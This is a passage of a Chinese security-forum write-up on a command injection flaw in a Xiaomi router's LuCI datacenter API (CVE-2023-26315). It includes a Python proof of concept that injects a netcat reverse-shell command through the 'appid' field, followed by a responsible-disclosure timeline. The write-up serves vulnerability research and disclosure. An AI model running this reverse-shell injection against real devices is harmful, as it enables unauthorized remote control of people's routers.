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
|
|||
|
|
<p blockindex=60>因此,这里存在一个命令注入漏洞,该漏洞调用链至此分析完毕。</p>
|
|||
|
|
<h3 blockindex=61>Poc及演示结果</h3>
|
|||
|
|
<p blockindex=62>这里需要自行更改一下相关<code>IP</code>和<code>Token</code>值,此处注入了反弹<code>shell</code>的命令,端口<code>8888</code>。</p>
|
|||
|
|
<pre blockindex=63><code class="hljs language-python"><span class=hljs-keyword>import</span> requests
|
|||
|
|
|
|||
|
|
server_ip = <span class=hljs-string>"192.168.50.1"</span>
|
|||
|
|
client_ip = <span class=hljs-string>"192.168.50.105"</span>
|
|||
|
|
token = <span class=hljs-string>"814c55713043e7358d3c1f42f2a98438"</span>
|
|||
|
|
|
|||
|
|
nc_shell = <span class=hljs-string>";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} 8888 >/tmp/f;"</span>.<span class=hljs-built_in>format</span>(client_ip)
|
|||
|
|
|
|||
|
|
res = requests.post(<span class=hljs-string>"http://{}/cgi-bin/luci/;stok={}/api/xqdatacenter/request"</span>.<span class=hljs-built_in>format</span>(server_ip, token), data={<span class=hljs-string>'payload'</span>:<span class=hljs-string>'{"api":629, "appid":"'</span> + nc_shell + <span class=hljs-string>'"}'</span>})
|
|||
|
|
|
|||
|
|
<span class=hljs-built_in>print</span>(res.text)
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=64><img src=data:image/png;base64,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
|
|||
|
|
<h3 blockindex=65>写在最后</h3>
|
|||
|
|
<p blockindex=66>此篇文章仅作抛砖引玉,在<code>datacenter</code>,<code>plugincenter</code>以及<code>indexservice</code>内不同<code>api</code>的<code>handler</code>函数可能就有几百个(当然这里可以结合<code>fuzz</code>),以及<code>thriftunnel</code>的其他<code>option</code>操作也这么往下挖下去,我想应该也会存在漏洞。笔者也只是在小米当时赏金活动那几天大概看了看,后续也没再继续深入看这些地方了,本来想留着后面继续挖的,但是准备了一年保研感觉心态发生了一些奇妙的变化,研究生可能更想去尝试下其他更深入的方面,不想再做单纯的这样挖洞了,所以也就放出来了。感兴趣的读者可继续探索,挖到了也可以分享在评论区。</p>
|
|||
|
|
<hr blockindex=67>
|
|||
|
|
<p blockindex=68><strong>时间线:</strong></p>
|
|||
|
|
<ul blockindex=69>
|
|||
|
|
<li>2023-03-26 提交漏洞报告至小米安全中心(Xiaomi Security Center)</li>
|
|||
|
|
<li>2023-04-03 厂商验证后确认两个漏洞存在,并开始修复漏洞</li>
|
|||
|
|
<li>2023-05-24 两个漏洞的赏金均到账(活动期间还翻倍了,挺爽)</li>
|
|||
|
|
<li>2023-06-09 厂商告知漏洞已全部修复完成(但似乎补丁未立即发布)</li>
|
|||
|
|
<li>2024-05-09 联系厂商分配其中一个漏洞编号 CVE-2023-26315 并披露</li>
|
|||
|
|
<li>2024-06-12 CNVD 收录本文漏洞,分配编号 CNVD-2024-23093 并公开</li>
|
|||
|
|
</ul></div></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="post-opt mt-30">
|
|||
|
|
<ul class="list-inline text-muted">
|
|||
|
|
<li>
|
|||
|
|
<i class="fa fa-clock-o"></i>
|
|||
|
|
发表于 2024-05-23 09:00:00
|
|||
|
|
</li>
|
|||
|
|
<li>阅读 ( 695 )</li>
|
|||
|
|
<li>分类:<a href=https://forum.butian.net/community/Hardware%20and%20IOT target=_blank rel="noopenner noreferrer">硬件与物联网</a>
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="text-center mt-30 mb-20">
|
|||
|
|
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=3000 data-support_num=6> 6 推荐</button>
|
|||
|
|
|
|||
|
|
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=3000> 收藏</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-answers mt-15">
|
|||
|
|
<h2 class="h4 post-title">1 条评论</h2>
|
|||
|
|
<div class=comment>
|
|||
|
|
<div class=media>
|
|||
|
|
<div class=media-left>
|
|||
|
|
<a href=https://forum.butian.net/people/18792 class="avatar-link user-card" target=_blank rel="noopenner noreferrer">
|
|||
|
|
<img class="avatar-40 hidden-xs" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAgEAlgCWAAD/7QAsUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAAlgAAAAEAAQCWAAAAAQAB/+E+rWh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8APD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4KPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNi4wLWMwMDQgNzkuMTY0NTcwLCAyMDIwLzExLzE4LTE1OjUxOjQ2ICAgICAgICAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iCiAgICAgICAgICAgIHhtbG5zOnhtcEdJbWc9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9nL2ltZy8iCiAgICAgICAgICAgIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyI+CiAgICAgICAgIDx4bXA6Q3JlYXRvclRvb2w+QWRvYmUgSWxsdXN0cmF0b3IgMjUuMiAoTWFjaW50b3NoKTwveG1wOkNyZWF0b3JUb29sPgogICAgICAgICA8eG1wOkNyZWF0ZURhdGU+MjAyMS0wOC0yM1QxNjo1NjowNSswODowMDwveG1wOkNyZWF0ZURhdGU+CiAgICAgICAgIDx4bXA6VGh1bWJuYWlscz4KICAgICAgICAgICAgPHJkZjpBbHQ+CiAgICAgICAgICAgICAgIDxyZGY6bGkgcmRmOnBhcnNlVHlwZT0iUmVzb3VyY2UiPgogICAgICAgICAgICAgICAgICA8eG1wR0ltZzp3aWR0aD4yNTY8L3htcEdJbWc6d2lkdGg+CiAgICAgICAgICAgICAgICAgIDx4bXBHSW1nOmhlaWdodD4yNTY8L3htcEdJbWc6aGVpZ2h0PgogICAgICAgICAgICAgICAgICA8eG1wR0ltZzpmb3JtYXQ+SlBFRzwveG1wR0ltZzpmb3JtYXQ+CiAgICAgICAgICAgICAgICAgIDx4bXBHSW1nOmltYWdlPi85ai80QUFRU2taSlJnQUJBZ0VBU0FCSUFBRC83UUFzVUdodmRHOXphRzl3SURNdU1BQTRRa2xOQSswQUFBQUFBQkFBU0FBQUFBRUEmI3hBO0FRQklBQUFBQVFBQi8rNEFEa0ZrYjJKbEFHVEFBQUFBQWYvYkFJUUFCZ1FFQkFVRUJnVUZCZ2tHQlFZSkN3Z0dCZ2dMREFvS0N3b0smI3hBO0RCQU1EQXdNREF3UURBNFBFQThPREJNVEZCUVRFeHdiR3hzY0h4OGZIeDhmSHg4Zkh3RUhCd2NOREEwWUVCQVlHaFVSRlJvZkh4OGYmI3hBO0h4OGZIeDhmSHg4Zkh4OGZIeDhmSHg4Zkh4OGZIeDhmSHg4Zkh4OGZIeDhmSHg4Zkh4OGZIeDhmSHg4Zi84QUFFUWdCQUFFQUF3RVImI3hBO0FBSVJBUU1SQWYvRUFhSUFBQUFIQVFFQkFRRUFBQUFBQUFBQUFBUUZBd0lHQVFBSENBa0tDd0VBQWdJREFRRUJBUUVBQUFBQUFBQUEmI3hBO0FRQUNBd1FGQmdjSUNRb0xFQUFDQVFNREFnUUNCZ2NEQkFJR0FuTUJBZ01SQkFBRklSSXhRVkVHRTJFaWNZRVVNcEdoQnhXeFFpUEImI3hBO1V0SGhNeFppOENSeWd2RWxRelJUa3FLeVkzUENOVVFuazZPek5oZFVaSFREMHVJSUpvTUpDaGdaaEpSRlJxUzBWdE5WS0JyeTQvUEUmI3hBOzFPVDBaWFdGbGFXMXhkWGw5V1oyaHBhbXRzYlc1dlkzUjFkbmQ0ZVhwN2ZIMStmM09FaFlhSGlJbUtpNHlOam8rQ2s1U1ZscGVZbVomI3hBO3FibkoyZW41S2pwS1dtcDZpcHFxdXNyYTZ2b1JBQUlDQVFJREJRVUVCUVlFQ0FNRGJRRUFBaEVEQkNFU01VRUZVUk5oSWdaeGdaRXkmI3hBO29iSHdGTUhSNFNOQ0ZWSmljdkV6SkRSRGdoYVNVeVdpWTdMQ0IzUFNOZUpFZ3hkVWt3Z0pDaGdaSmpaRkdpZGtkRlUzOHFPend5Z3AmI3hBOzArUHpoSlNrdE1UVTVQUmxkWVdWcGJYRjFlWDFSbFptZG9hV3ByYkcxdWIyUjFkbmQ0ZVhwN2ZIMStmM09FaFlhSGlJbUtpNHlOam8mI3hBOytEbEpXV2w1aVptcHVjblo2ZmtxT2twYWFucUttcXE2eXRycSt2L2FBQXdEQVFBQ0VRTVJBRDhBOVFZcTdGWFlxN0ZYWXE3RlhZcTcmI3hBO0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0YmI3hBO1hZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlgmI3hBO1lxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFkmI3hBO3E3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXEmI3hBOzdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTcmI3hBO0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcXBYZDNhV2R2SmMzYzBkdmJSRGxMUEt3UkZIaXpNUUJpcVc2RDUmI3hBO3U4cStZQklkQzFpeTFUMHFpVVdkeEZPVm9hZkVJMllqNmNWVGZGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXEmI3hBOzdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcWtYbUx6MTVNOHRxVHIydDJXbXNCeUVWeE9pU2tmNU1kZWJmUU1WZVJlZWYrY3UmI3hBO1BKT202YzYrVTRaZGMxV1U4TE5wSW5ndGExb1hibndtWUE5QXFEa2R1UXhWaXVqZmtUK2IzNXF6UjY5K1ordVhHbGFkSTNxVzJrY2YmI3hBOzN5b2VuQzNxc1Z0c2FWWUYvd0NZWXFqL0FEci9BTTRuM25sMktQekYrVm1yM3NPdDZjdnFDem5sWDFaU2czOUNhTlk2TzFQc01PTGUmI3hBO0k2WXFpL3kvL3dDY3R0Ri9SYVdIbjYxdWJIWExKakJmM2tFSEtJbFR4OVNXRlNKSW01Yk1xb1J5OEtoY1ZlditXdnpWL0xuek54WFImI3hBO1BNTmxkU3ZUamJtUVJUbXYvRk12Q1gvaGNWWlhpcnNWZGlyc1ZkaXJzVmRpcnNWZGlyc1ZkaXJzVmRpcnNWZGlyc1ZkaXJzVmRpcnMmI3hBO1ZkaXJzVmFabFZTekVLcWlyTWRnQU1WZWVlYlArY2dQeW04czhrdk5laHU3cGFqNnBwLytseVZIVUV4VmpRLzY3REZYalBtci9uTmEmI3hBOzRibEY1VTh2TEdQMkx2VkpDe
|
|||
|
|
</div>
|
|||
|
|
<div class=media-body>
|
|||
|
|
<div class=media-heading>
|
|||
|
|
<strong>
|
|||
|
|
<a href=https://forum.butian.net/people/18792 class="mr-5 user-card">webqs</a>
|
|||
|
|
</strong>
|
|||
|
|
<span class="answer-time text-muted hidden-xs">11小时前</span>
|
|||
|
|
</div>
|
|||
|
|
<div class=content>
|
|||
|
|
<div class="text-fmt mt-10 mb-10">师傅tql</div>
|
|||
|
|
</div>
|
|||
|
|
<div class=media-footer>
|
|||
|
|
<ul class="list-inline mb-20">
|
|||
|
|
<li><a class="comments first-comment-reply" data-toggle=collapse href=#comment-1919 data-source=1919 data-source_id=1919 data-to_user_id=18792 data-source_type=comment data-message="回复 webqs"><i class="fa fa-comment-o"></i> 0 条评论</a></li>
|
|||
|
|
<li class=pull-right>
|
|||
|
|
<button class="btn btn-default btn-sm btn-support" data-source_id=1919 data-source_type=comment data-support_num=0><i class="fa fa-thumbs-o-up"></i> 0</button>
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="collapse widget-comments sf-hidden" id=comment-1919>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-comment-form row mt-20 mb-20">
|
|||
|
|
<div class=col-md-12>
|
|||
|
|
请先 <a class=a_unLogin href=https://forum.butian.net/login>登录</a> 后评论
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=text-center>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer id=footer>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class=text-center>
|
|||
|
|
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
|
|||
|
|
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
|
|||
|
|
<a href=https://forum.butian.net/sitemap>sitemap</a>
|
|||
|
|
</div>
|
|||
|
|
<div class="copyright mt-10">
|
|||
|
|
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-3000 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span id=cnzz_stat_icon_1279782571></span>
|
|||
|
|
<div class="geetest_panel geetest_wind" style=display:none></div>
|